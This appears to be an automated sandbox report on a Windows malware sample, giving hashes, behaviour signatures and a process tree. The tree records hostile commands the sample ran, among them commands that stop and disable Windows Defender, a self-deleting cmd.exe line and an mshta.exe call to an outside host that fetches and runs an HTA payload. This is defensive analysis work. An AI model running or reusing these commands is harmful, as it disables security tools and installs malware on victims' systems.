Overview

overview

10

Static

static

b4a99fc882...c7.exe

windows7-x64

10

b4a99fc882...c7.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    01/12/2022, 19:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe

  • Size

    2.2MB

  • MD5

    7e9163186764adcc6ca4266245338469

  • SHA1

    d81c8dbc93a2c231bde95790e95ab41fd61a69e5

  • SHA256

    b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7

  • SHA512

    b6868287bcfea581c411f30e74b9aa508a51ea323176d41fcb7a736a939f55adecc2f438ce9593fcadc97b95e9f68e4c718c0d7f77c6fc3b248c3b45ac8a8be1

  • SSDEEP

    49152:iCqfgdwTM34pnNSzsIjxQCqsMbvVNMbue/nMzA4pW2xWeZ0Rm2op7hTzxC:JQDHShtBqsMbvFeaxXMIp79zxC

Score
10/10
evasionpersistence

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=ORXGKKZC&2=i-s&3=59&4=7601&5=6&6=1&7=99600&8=1033

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 16 IoCs
    persistence
  • Stops running service(s) 3 TTPs
    evasion
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe
    "C:\Users\Admin\AppData\Local\Temp\b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      2⤵
      • Launches sc.exe
      PID:1976
    • C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      PID:892
    • C:\Windows\SysWOW64\net.exe
      net stop msmpsvc
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop msmpsvc
        3⤵
          PID:1360
      • C:\Windows\SysWOW64\sc.exe
        sc config msmpsvc start= disabled
        2⤵
        • Launches sc.exe
        PID:1232
      • C:\Users\Admin\AppData\Roaming\Microsoft\noyixl.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\noyixl.exe
        2⤵
        • Modifies WinLogon for persistence
        • Executes dropped EXE
        • Sets file execution options in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1240
        • C:\Windows\SysWOW64\sc.exe
          sc stop WinDefend
          3⤵
          • Launches sc.exe
          PID:1864
        • C:\Windows\SysWOW64\sc.exe
          sc config WinDefend start= disabled
          3⤵
          • Launches sc.exe
          PID:336
        • C:\Windows\SysWOW64\net.exe
          net stop msmpsvc
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1132
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop msmpsvc
            4⤵
              PID:2044
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            3⤵
            • Launches sc.exe
            PID:812
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=ORXGKKZC&2=i-s&3=59&4=7601&5=6&6=1&7=99600&8=1033"
            3⤵
            • Modifies Internet Explorer settings
            PID:984
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\B4A99F~1.EXE" >> NUL
          2⤵
          • Deletes itself
          PID:1776

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\noyixl.exe
        Filesize

        2.2MB

        MD5

        7e9163186764adcc6ca4266245338469

        SHA1

        d81c8dbc93a2c231bde95790e95ab41fd61a69e5

        SHA256

        b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7

        SHA512

        b6868287bcfea581c411f30e74b9aa508a51ea323176d41fcb7a736a939f55adecc2f438ce9593fcadc97b95e9f68e4c718c0d7f77c6fc3b248c3b45ac8a8be1

        Download Submit

      • \Users\Admin\AppData\Roaming\Microsoft\noyixl.exe
        Filesize

        2.2MB

        MD5

        7e9163186764adcc6ca4266245338469

        SHA1

        d81c8dbc93a2c231bde95790e95ab41fd61a69e5

        SHA256

        b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7

        SHA512

        b6868287bcfea581c411f30e74b9aa508a51ea323176d41fcb7a736a939f55adecc2f438ce9593fcadc97b95e9f68e4c718c0d7f77c6fc3b248c3b45ac8a8be1

        Download Submit

      • \Users\Admin\AppData\Roaming\Microsoft\noyixl.exe
        Filesize

        2.2MB

        MD5

        7e9163186764adcc6ca4266245338469

        SHA1

        d81c8dbc93a2c231bde95790e95ab41fd61a69e5

        SHA256

        b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7

        SHA512

        b6868287bcfea581c411f30e74b9aa508a51ea323176d41fcb7a736a939f55adecc2f438ce9593fcadc97b95e9f68e4c718c0d7f77c6fc3b248c3b45ac8a8be1

        Download Submit

      • memory/1240-80-0x0000000002000000-0x000000000205A000-memory.dmp

        Filesize

        360KB

        Download

      • memory/1240-79-0x0000000000400000-0x0000000000868000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/1240-70-0x0000000000400000-0x0000000000868000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/1240-71-0x0000000002000000-0x000000000205A000-memory.dmp

        Filesize

        360KB

        Download

      • memory/1992-68-0x0000000000400000-0x0000000000868000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/1992-56-0x0000000000290000-0x00000000002EA000-memory.dmp

        Filesize

        360KB

        Download

      • memory/1992-55-0x0000000000400000-0x0000000000868000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/1992-67-0x0000000000290000-0x00000000002EA000-memory.dmp

        Filesize

        360KB

        Download

      • memory/1992-54-0x0000000076141000-0x0000000076143000-memory.dmp

        Filesize

        8KB

        Download